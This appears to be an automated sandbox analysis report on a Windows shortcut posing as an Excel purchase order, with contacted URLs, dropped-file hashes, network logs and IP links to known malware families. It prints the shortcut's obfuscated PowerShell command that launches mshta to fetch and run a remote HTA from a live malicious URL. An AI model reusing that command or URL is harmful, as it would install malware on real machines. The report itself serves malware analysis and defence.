    https://www.sessosesso.it/assets/aw/drip.htaHmshta.exe, 00000004.00000002.3448478474.000001B9653E0000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://g.live.com/odclientsettings/Prod1C:edb.log.6.drfalse
      high
      https://www.sessosesso.it/assets/aw/drip.htaKmshta.exe, 00000004.00000002.3448055036.000001B965207000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://www.sessosesso.it/mshta.exe, 00000004.00000002.3448055036.000001B9652B9000.00000004.00000020.00020000.00000000.sdmptrue
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      https://www.sessosesso.it/assets/aw/drip.hta...mshta.exe, 00000004.00000002.3450455572.000001C167DF0000.00000004.00000020.00020000.00000000.sdmpfalse
      • 2%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      https://www.sessosesso.it/)mshta.exe, 00000004.00000002.3448055036.000001B9652B9000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://www.sessosesso.it/assets/aw/drip.htaXmshta.exe, 00000004.00000002.3448055036.000001B965226000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3450455572.000001C167DD0000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://www.sessosesso.it/assets/aw/drip.hta0?imshta.exe, 00000004.00000002.3448055036.000001B965274000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://www.sessosesso.it/assets/aw/drip.htadowsmshta.exe, 00000004.00000002.3448055036.000001B965274000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://www.sessosesso.it/assets/aw/drip.htaHumshta.exe, 00000004.00000002.3449395275.000001C1671C4000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://www.sessosesso.it/assets/aw/drip.htaamshta.exe, 00000004.00000002.3448055036.000001B965200000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      89.46.106.29
      www.sessosesso.itItaly
      31034ARUBA-ASNITtrue
      IP
      127.0.0.1
      Joe Sandbox version:40.0.0 Tourmaline
      Analysis ID:1430753
      Start date and time:2024-04-24 06:44:14 +02:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 5m 1s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:9
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:#U56de#U590d BULK ORDER PO#GDN-JL-OO-231227.xlsx.lnk
      renamed because original name is a hash value
      Original Sample Name: BULK ORDER PO#GDN-JL-OO-231227.xlsx.lnk
      Detection:MAL
      Classification:mal88.rans.evad.winLNK@5/14@1/2
      EGA Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 2
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Found application associated with file extension: .lnk
      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
      • Excluded IPs from analysis (whitelisted): 184.28.122.106
      • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
      • Execution Graph export aborted for target mshta.exe, PID 6544 because it is empty
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtProtectVirtualMemory calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      TimeTypeDescription
      06:45:15API Interceptor5x Sleep call for process: powershell.exe modified
      06:45:19API Interceptor2x Sleep call for process: svchost.exe modified
      06:45:19API Interceptor2x Sleep call for process: mshta.exe modified
      No context
      No context
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      ARUBA-ASNIT2x6j7GSmbu.exeGet hashmaliciousFormBookBrowse
      • 62.149.189.71
      EYhvUxUIsT.elfGet hashmaliciousMiraiBrowse
      • 95.110.130.125
      2EFEN3j6ml.elfGet hashmaliciousUnknownBrowse
      • 80.211.52.147
      PhvvLCLFym.elfGet hashmaliciousMiraiBrowse
      • 95.110.143.4
      HfuP5Csj29.elfGet hashmaliciousMiraiBrowse
      • 31.14.139.42
      UGXRHW5XnG.elfGet hashmaliciousMiraiBrowse
      • 217.73.230.186
      Gq730kmpiE.elfGet hashmaliciousUnknownBrowse
      • 188.213.171.76
      uvaXiyELu9.elfGet hashmaliciousMiraiBrowse
      • 212.237.50.240
      lUJIhHyHmC.elfGet hashmaliciousMirai, MoobotBrowse
      • 5.249.139.193
      XJBYhQFCGi.exeGet hashmaliciousFormBookBrowse
      • 62.149.128.40
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      37f463bf4616ecd445d4a1937da06e19181_960.msiGet hashmaliciousUnknownBrowse
      • 89.46.106.29
      UXNob1Dp32.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
      • 89.46.106.29
      3CB27VUHRg.exeGet hashmaliciousBabuk, DjvuBrowse
      • 89.46.106.29
      mJVVW85CnW.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
      • 89.46.106.29
      JfOWsh7v0r.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
      • 89.46.106.29
      AaIo4VGgvO.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
      • 89.46.106.29
      file.exeGet hashmaliciousVidarBrowse
      • 89.46.106.29
      file.exeGet hashmaliciousVidarBrowse
      • 89.46.106.29
      768.xla.xlsxGet hashmaliciousUnknownBrowse
      • 89.46.106.29
      file.exeGet hashmaliciousVidarBrowse
      • 89.46.106.29
      No context
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):1310720
      Entropy (8bit):0.7263274597090444
      Encrypted:false
      SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0Q:9JZj5MiKNnNhoxuV
      MD5:CCA651E366C92205C2B922C4BF77357E
      SHA1:BE9301541F55707BE43C52BA0449968B47D5E728
      SHA-256:89C6DBECAE9CC35AF6145C19A99F9F36C1912AC5CFA49E9318B8F8E135392083
      SHA-512:F1EB9BA88C2451703EA47E8D7F66ADA5FDDB0A407D21412E2E913A6B1AE8D4BDE653A27FA75085E2272C30B30353ADB0753CF38130E366C498A825780BD92484
      Malicious:false
      Reputation:low
      Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
      Process:C:\Windows\System32\svchost.exe
      File Type:Extensible storage user DataBase, version 0x620, checksum 0xf8a450ab, page size 16384, DirtyShutdown, Windows version 10.0
      Category:dropped
      Size (bytes):1310720
      Entropy (8bit):0.7555701008276097
      Encrypted:false
      SSDEEP:1536:dSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:dazaSvGJzYj2UlmOlOL
      MD5:02B3A4041F31A2477273B8114A8BA97E
      SHA1:63D621DC1137C567B700BE5E4B4D516FA3E56835
      SHA-256:8F55091B437F32E42D74822B96385D97127F3E1E918B30D6A9BC182918D6A47F
      SHA-512:5E0E4ED9EC3AF7886AF824087DD1BD7029B991BD737AC99A8A5BC6BA147397F9B99B22C31DC4CEEF47FC4FFB5AC26D67011A21C49BD69EB08B04E117F3157B67
      Malicious:false
      Reputation:low
      Preview:..P.... .......7.......X\...;...{......................0.e......!...{?..-...|e.h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{..................................O.F..-...|e......................-...|e..........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):16384
      Entropy (8bit):0.07951835983893035
      Encrypted:false
      SSDEEP:3:DClS6YeBMuaqeuNaAPaU1l2TGt/lolluxmO+l/SNxOf:36zBlaluNDPaUqGQgmOH
      MD5:D9CABE18F6A1456E9F205E6A6AA9BB57
      SHA1:4BB694D2D3AD7C872999E1E03E85C67D32FEB8A2
      SHA-256:CBC8C028CAEA724CEBE538790431D5BEA117A7C30A90C269717D15D6C2AA8E08
      SHA-512:96318703102BE65AE1CA0ADA7DE91FFBB4BB67E26534398C93E2445970CA2255E8A8A2FFF7C17FF129E28A6E7835C1432385BB29C92F1E02A385F1C859CA478A
      Malicious:false
      Reputation:low
      Preview:.wg......................................;...{...-...|e..!...{?..........!...{?..!...{?..g...!...{?......................-...|e.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Windows\System32\mshta.exe
      File Type:data
      Category:dropped
      Size (bytes):49120
      Entropy (8bit):0.0017331682157558962
      Encrypted:false
      SSDEEP:3:Ztt:T
      MD5:0392ADA071EB68355BED625D8F9695F3
      SHA1:777253141235B6C6AC92E17E297A1482E82252CC
      SHA-256:B1313DD95EAF63F33F86F72F09E2ECD700D11159A8693210C37470FCB84038F7
      SHA-512:EF659EEFCAB16221783ECB258D19801A1FF063478698CF4FCE3C9F98059CA7B1D060B0449E6FD89D3B70439D9735FA1D50088568FF46C9927DE45808250AEC2E
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Windows\System32\mshta.exe
      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
      Category:dropped
      Size (bytes):1706
      Entropy (8bit):5.274543201400288
      Encrypted:false
      SSDEEP:48:NIAbzyYh8rRLkRVNaktqavP61GJZoF+SMy:xWqxztqaHO
      MD5:B9BEC45642FF7A2588DC6CB4131EA833
      SHA1:4D150A53276C9B72457AE35320187A3C45F2F021
      SHA-256:B0ABE318200DCDE42E2125DF1F0239AE1EFA648C742DBF9A5B0D3397B903C21D
      SHA-512:C119F5625F1FC2BCDB20EE87E51FC73B31F130094947AC728636451C46DCED7B30954A059B24FEF99E1DB434581FD9E830ABCEB30D013404AAC4A7BB1186AD3A
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview:...window.onerror = HandleError..function HandleError(message, url, line)..{..var str = L_Dialog_ErrorMessage + "\n\n"..+ L_ErrorNumber_Text + line + "\n"..+ message;..alert (str);..window.close();..return true;..}..function loadBdy()..{..var objOptions = window.dialogArguments;..btnNo.onclick = new Function("btnOKClick()");..btnNo.onkeydown = new Function("SwitchFocus()");..btnYes.onclick = new Function("btnYesClick()");..btnYes.onkeydown = new Function("SwitchFocus()");..document.onkeypress = new Function("docKeypress()");..spnLine.innerText = objOptions.getAttribute("errorLine");..spnCharacter.innerText = objOptions.getAttribute("errorCharacter");..spnError.innerText = objOptions.getAttribute("errorMessage");..spnCode.innerText = objOptions.getAttribute("errorCode");..txaURL.innerText = objOptions.getAttribute("errorUrl");..if (objOptions.errorDebug)..{..divDebug.innerText = L_ContinueScript_Message;..}..btnYes.focus();..}..function SwitchFocus()..{..var HTML_KEY_ARROWLEFT = 37;..
      Process:C:\Windows\System32\mshta.exe
      File Type:OpenPGP Public Key
      Category:dropped
      Size (bytes):78915
      Entropy (8bit):6.356438946495996
      Encrypted:false
      SSDEEP:1536:TtaE9w7HKpKdXZK4CG7JqsNFvdMkBv87NFWYp2MouWnedZnZ77ZYzN25uugdF6e3:TtpiqpKdXZK4CG7JqsNFvdMkBv87NFWD
      MD5:1DDC76C93EF392B9A660EE87FE4A547A
      SHA1:28AA0BD1B4000B0BB887B6E5175A9D956D753DBC
      SHA-256:CFBD327F358A6C53277F1EAAA810ECC503F5122FC22DF89BA2BD1E4E199FC021
      SHA-512:1550B625D7014B842EDD10A02C8BDE5C90435849C36CD7A2C17AA990DB9362A19A83B6949C203EC94FEB4C9EDF4EB903691785961E7626CD189049E04D5929EB
      Malicious:false
      Reputation:low
      Preview:..|O....&e:..>j..._ ....Q..9.B.".m].....o0...tz,..ad...|.......+.WkO.Q.n....k...v........S.t#=.H..Ab.dnz.p5-O.2.Z7..=W..."...0.9.8hn..9![8.......%.|...?.e.At..@ .|.S....y....).fA.....D.(.....1bc..!d, .~3...<..3.R..h8.*.W.....R.HpE....Wd..+px.y1...wO)9,.wf..8..V..l......S..... ....&..jReD|.#d! ng{@.X....F..".y.-...i.'.i.b/O.`ei...G....#..0Z@.p7...H....x@+...X.....z.AE.z_..U.....!.1q.p...,.T..Zo.Q%.....hh..#.O..SlKf...G.v&.n:........g..$..MF....g.q"..&..p......}...P...p./^Hf3...?.Z.m....".5w.x.z+....hO...B.=.r=.m"wja.....s...!@.RF.,v.G{v.L..N.h..!.z..P=.r..VP..I'.K.c}.Y.d..%.q...j{6ul.8.........Q..Ws.N:...G._P.l...n.v.Ef.h.m . .(B..t&2)..(z%^.hE.0.H.G..\......&.7..d..xE.v..@e.;'/.z...c..._.h4_TV'...R.-.r.0d.$......!......*7B v.>.QF..M..)2u.wJG.G.>...U...;...0...C.._e.....w..X...8....V9.f."..U..;H...?A>E...7..._.R..%..N...y.............gF...I.."KnQ...W..'.....i`..2....&v..Vr..b.D...L.'.\.P..f.S...A..SH..t.6*.......8..X.....N/r.j.?u?l.
      Process:C:\Windows\System32\mshta.exe
      File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
      Category:dropped
      Size (bytes):3249
      Entropy (8bit):5.4598794938059125
      Encrypted:false
      SSDEEP:96:vKFrZ/kxjqD9zqp36wxVJddFAdd5Ydddopdyddv+dd865FhlleXckVDuca:CGpv+GkduSDl6LRa
      MD5:939A9FBD880F8B22D4CDD65B7324C6DB
      SHA1:62167D495B0993DD0396056B814ABAE415A996EE
      SHA-256:156E7226C757414F8FD450E28E19D0A404FDBA2571425B203FDC9C185CF7FF0E
      SHA-512:91428FFA2A79F3D05EBDB19ED7F6490A4CEE788DF709AB32E2CDC06AEC948CDCCCDAEBF12555BE4AD315234D30F44C477823A2592258E12D77091FA01308197B
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview:...<HTML id=dlgError STYLE="font-family: ms sans serif; font-size: 8pt;..width: 41.4em; height: 24em">..<HEAD>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<META HTTP-EQUIV="MSThemeCompatible" CONTENT="Yes">..<TITLE id=dialogTitle>..Script Error..</TITLE>..<SCRIPT>..var L_Dialog_ErrorMessage = "An error has occurred in this dialogue.";..var L_ErrorNumber_Text = "Error: ";..var L_ContinueScript_Message = "Do you want to debug the current page?";..var L_AffirmativeKeyCodeLowerCase_Number = 121;..var L_AffirmativeKeyCodeUpperCase_Number = 89;..var L_NegativeKeyCodeLowerCase_Number = 110;..var L_NegativeKeyCodeUpperCase_Number = 78;..</SCRIPT>..<SCRIPT LANGUAGE="JavaScript" src="error.js" defer></SCRIPT>..</HEAD>..<BODY ID=bdy onLoad="loadBdy()" style="font-family: 'ms sans serif';..font-size: 8pt; background: threedface; color: windowtext;" topmargin=0>..<CENTER id=ctrErrorMessage>..<table id=tbl1 cellPadding=3 cellspacing=3 border=0..style="background: buttonfa
      Process:C:\Windows\System32\mshta.exe
      File Type:GIF image data, version 89a, 36 x 38
      Category:dropped
      Size (bytes):1062
      Entropy (8bit):4.517838839626174
      Encrypted:false
      SSDEEP:12:z4ENetWsdvCMtkEFk+t2cd3ikIbOViGZVsMLfE4DMWUcC/GFvyVEZd6vcmadxVtS:nA/ag/QSi6/LKZzqKVQgJOexQkYfG6E
      MD5:124A9E7B6976F7570134B7034EE28D2B
      SHA1:E889BFC2A2E57491016B05DB966FC6297A174F55
      SHA-256:5F95EFF2BCAAEA82D0AE34A007DE3595C0D830AC4810EA4854E6526E261108E9
      SHA-512:EA1B3CC56BD41FC534AAC00F186180345CB2C06705B57C88C8A6953E6CE8B9A2E3809DDB01DAAC66FA9C424D517D2D14FA45FBEF9D74FEF8A809B71550C7C145
      Malicious:false
      Preview:GIF89a$.&.......h...............h.hh..h..h..h..h....h................h.................h.................h................hh.h..h..h..h..h.hhhhh.hh.hh.hh.hh..hh.h..h..h.h..h..hh.h..h..h..h..h..hh.h..h..h..h..h..hh.h..h..h..h..h...h...............h.hh..h..h..h..h....h...............h................h...........h.................h...............h.hh..h..h..h..h....h................h.................h.................h.................h..............h.hh.h..h..h..h....h..............h................h................h................h...............h.hh..h..h..h..h....h................h.................h.................h......................................................................................................................................!.......,....$.&.@......H.......<0.....VXQH..C..1>.(..@..C.t.q"B..S.\.r.D...Z.. .M.41.".......<.r.;.r4..P..]....+.T-...N...x....1.:..TdD...^.j..W.r...y....V...Lx0..):8p q.4.;...f`.r-K...(..P....t.].~..l..
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:data
      Category:dropped
      Size (bytes):64
      Entropy (8bit):1.1940658735648508
      Encrypted:false
      SSDEEP:3:Nlllul3nqth:NllUa
      MD5:851531B4FD612B0BC7891B3F401A478F
      SHA1:483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
      SHA-256:383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
      SHA-512:A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
      Malicious:false
      Preview:@...e.................................&..............@..........
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:ASCII text, with no line terminators
      Category:dropped
      Size (bytes):60
      Entropy (8bit):4.038920595031593
      Encrypted:false
      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
      MD5:D17FE0A3F47BE24A6453E9EF58C94641
      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
      Malicious:false
      Preview:# PowerShell test file to determine AppLocker lockdown mode
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:ASCII text, with no line terminators
      Category:dropped
      Size (bytes):60
      Entropy (8bit):4.038920595031593
      Encrypted:false
      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
      MD5:D17FE0A3F47BE24A6453E9EF58C94641
      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
      Malicious:false
      Preview:# PowerShell test file to determine AppLocker lockdown mode
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:data
      Category:dropped
      Size (bytes):5521
      Entropy (8bit):3.5701139694503548
      Encrypted:false
      SSDEEP:48:P5Oj9gdCZlXuCrdZvte+gk/+zd7lHJISogZo5AAk/+zd7lLISogZo501:P5OBnuCXgk/+zd7pHMPk/+zd7/HMu
      MD5:9922EDD6749145AD3CE55E8CC2F88DA4
      SHA1:7D231882B307B885CEEF41B4F627C0670234B048
      SHA-256:4EB1A56CD925890AD0D9988FAB3A6B49D2E1BD5EB99EF8E8883214A0E4E79B71
      SHA-512:DA62A8BBB2A09DDA2F33407F6FC0DE47A8D7DC4D1112839683F4A07234F60C9478C2D4136FB7D6FB816696625FA8A4E18AECF2AF909FF37A9A8CF32FB84B5627
      Malicious:false
      Preview:...................................FL..................F.`.. ....c%.W......2....]..1.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........S....(..W......2........2......X.% .#U56DE~1.LNK.........EW.5.X.%..............................#.U.5.6.d.e.#.U.5.9.0.d. .B.U.L.K. .O.R.D.E.R. .P.O.#.G.D.N.-.J.L.-.O.O.-.2.3.1.2.2.7...x.l.s.x...l.n.k.......}...............-.......|...........5.@......C:\Users\user\Desktop\#U56de#U590d BULK ORDER PO#GDN-JL-OO-231227.xlsx.lnk..A.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.r.o.o.t.\.O.f.f.i.c.e.1.6.\.X.L.I.C.O.N.S...E.X.E.........%ProgramFiles(x86)%\Microsoft Office\root\Office16\XLICONS.EXE......................................................................................................................................................................................................%.P.r.o.g.r.a.m.F.i.l.e.s.(.x.8.6.).%.\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.r.o.o.t.\.O.f.f.i.c.e.1.6
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:data
      Category:dropped
      Size (bytes):5521
      Entropy (8bit):3.5701139694503548
      Encrypted:false
      SSDEEP:48:P5Oj9gdCZlXuCrdZvte+gk/+zd7lHJISogZo5AAk/+zd7lLISogZo501:P5OBnuCXgk/+zd7pHMPk/+zd7/HMu
      MD5:9922EDD6749145AD3CE55E8CC2F88DA4
      SHA1:7D231882B307B885CEEF41B4F627C0670234B048
      SHA-256:4EB1A56CD925890AD0D9988FAB3A6B49D2E1BD5EB99EF8E8883214A0E4E79B71
      SHA-512:DA62A8BBB2A09DDA2F33407F6FC0DE47A8D7DC4D1112839683F4A07234F60C9478C2D4136FB7D6FB816696625FA8A4E18AECF2AF909FF37A9A8CF32FB84B5627
      Malicious:false
      Preview:...................................FL..................F.`.. ....c%.W......2....]..1.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........S....(..W......2........2......X.% .#U56DE~1.LNK.........EW.5.X.%..............................#.U.5.6.d.e.#.U.5.9.0.d. .B.U.L.K. .O.R.D.E.R. .P.O.#.G.D.N.-.J.L.-.O.O.-.2.3.1.2.2.7...x.l.s.x...l.n.k.......}...............-.......|...........5.@......C:\Users\user\Desktop\#U56de#U590d BULK ORDER PO#GDN-JL-OO-231227.xlsx.lnk..A.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.r.o.o.t.\.O.f.f.i.c.e.1.6.\.X.L.I.C.O.N.S...E.X.E.........%ProgramFiles(x86)%\Microsoft Office\root\Office16\XLICONS.EXE......................................................................................................................................................................................................%.P.r.o.g.r.a.m.F.i.l.e.s.(.x.8.6.).%.\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.r.o.o.t.\.O.f.f.i.c.e.1.6
      Process:C:\Windows\System32\svchost.exe
      File Type:JSON data
      Category:dropped
      Size (bytes):55
      Entropy (8bit):4.306461250274409
      Encrypted:false
      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
      MD5:DCA83F08D448911A14C22EBCACC5AD57
      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
      Malicious:false
      Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
      File type:MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=28, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
      Entropy (8bit):2.6193844421672794
      TrID:
      • Windows Shortcut (20020/1) 100.00%
      File name:#U56de#U590d BULK ORDER PO#GDN-JL-OO-231227.xlsx.lnk
      File size:2'307 bytes
      MD5:4a606840f1c2b5b09ea0de48beafc438
      SHA1:052f71b748a4f2b545c20a706da7415917a635f5
      SHA256:a27d930564362de498069ac312167b9c958b870c261ddda90754008fb3911fbb
      SHA512:c5fecbbc9ef10548c1756615bfd4c44b82de809218d7afa8372442933f4bd92ad7bda723cd736ababafd36dd0fca89ed4ea3dbd98d1dea58ff4805fcaab51d61
      SSDEEP:24:8fp/BHYVKVWXlMT+/CWmurDA4mzSzCdCZTCJCZkrab0JG:8fR5aepufA4m4CdCZTCJCZ6aQ
      TLSH:12419B106BF10714F7F79E7A2CB5B611D9377805DE12CF9D005141482475E61E479F1B
      File Content Preview:L..................F.@...........................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................
      Icon Hash:74f4e4c2cec9c1cd

      General

      Relative Path:..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command Line Argument:.(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://www.sessosesso.it/assets/aw/drip.hta
      Icon location:C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE
      TimestampSource PortDest PortSource IPDest IP
      Apr 24, 2024 06:45:17.767750978 CEST49720443192.168.2.689.46.106.29
      Apr 24, 2024 06:45:17.767791986 CEST4434972089.46.106.29192.168.2.6
      Apr 24, 2024 06:45:17.767947912 CEST49720443192.168.2.689.46.106.29
      Apr 24, 2024 06:45:17.822232008 CEST49720443192.168.2.689.46.106.29
      Apr 24, 2024 06:45:17.822257996 CEST4434972089.46.106.29192.168.2.6
      Apr 24, 2024 06:45:18.471044064 CEST4434972089.46.106.29192.168.2.6
      Apr 24, 2024 06:45:18.471123934 CEST49720443192.168.2.689.46.106.29
      Apr 24, 2024 06:45:18.547255039 CEST49720443192.168.2.689.46.106.29
      Apr 24, 2024 06:45:18.547274113 CEST4434972089.46.106.29192.168.2.6
      Apr 24, 2024 06:45:18.548302889 CEST4434972089.46.106.29192.168.2.6
      Apr 24, 2024 06:45:18.548368931 CEST49720443192.168.2.689.46.106.29
      Apr 24, 2024 06:45:18.550087929 CEST49720443192.168.2.689.46.106.29
      Apr 24, 2024 06:45:18.596134901 CEST4434972089.46.106.29192.168.2.6
      Apr 24, 2024 06:45:19.413547039 CEST4434972089.46.106.29192.168.2.6
      Apr 24, 2024 06:45:19.413578987 CEST4434972089.46.106.29192.168.2.6
      Apr 24, 2024 06:45:19.413599014 CEST4434972089.46.106.29192.168.2.6
      Apr 24, 2024 06:45:19.413633108 CEST49720443192.168.2.689.46.106.29
      Apr 24, 2024 06:45:19.413788080 CEST49720443192.168.2.689.46.106.29
      Apr 24, 2024 06:45:19.413801908 CEST4434972089.46.106.29192.168.2.6
      Apr 24, 2024 06:45:19.413821936 CEST4434972089.46.106.29192.168.2.6
      Apr 24, 2024 06:45:19.414082050 CEST49720443192.168.2.689.46.106.29
      Apr 24, 2024 06:45:19.726705074 CEST4434972089.46.106.29192.168.2.6
      Apr 24, 2024 06:45:19.726747036 CEST4434972089.46.106.29192.168.2.6
      Apr 24, 2024 06:45:19.726803064 CEST49720443192.168.2.689.46.106.29
      Apr 24, 2024 06:45:19.726824045 CEST4434972089.46.106.29192.168.2.6
      Apr 24, 2024 06:45:19.726855993 CEST49720443192.168.2.689.46.106.29
      Apr 24, 2024 06:45:19.727063894 CEST49720443192.168.2.689.46.106.29
      Apr 24, 2024 06:45:19.727440119 CEST4434972089.46.106.29192.168.2.6
      Apr 24, 2024 06:45:19.727478981 CEST4434972089.46.106.29192.168.2.6
      Apr 24, 2024 06:45:19.727510929 CEST49720443192.168.2.689.46.106.29
      Apr 24, 2024 06:45:19.727516890 CEST4434972089.46.106.29192.168.2.6
      Apr 24, 2024 06:45:19.727581024 CEST49720443192.168.2.689.46.106.29
      Apr 24, 2024 06:45:19.727581024 CEST49720443192.168.2.689.46.106.29
      Apr 24, 2024 06:45:19.728058100 CEST4434972089.46.106.29192.168.2.6
      Apr 24, 2024 06:45:19.728112936 CEST4434972089.46.106.29192.168.2.6
      Apr 24, 2024 06:45:19.728146076 CEST49720443192.168.2.689.46.106.29
      Apr 24, 2024 06:45:19.728152037 CEST4434972089.46.106.29192.168.2.6
      Apr 24, 2024 06:45:19.728166103 CEST4434972089.46.106.29192.168.2.6
      Apr 24, 2024 06:45:19.728180885 CEST49720443192.168.2.689.46.106.29
      Apr 24, 2024 06:45:19.728286982 CEST49720443192.168.2.689.46.106.29
      Apr 24, 2024 06:45:19.938061953 CEST49720443192.168.2.689.46.106.29
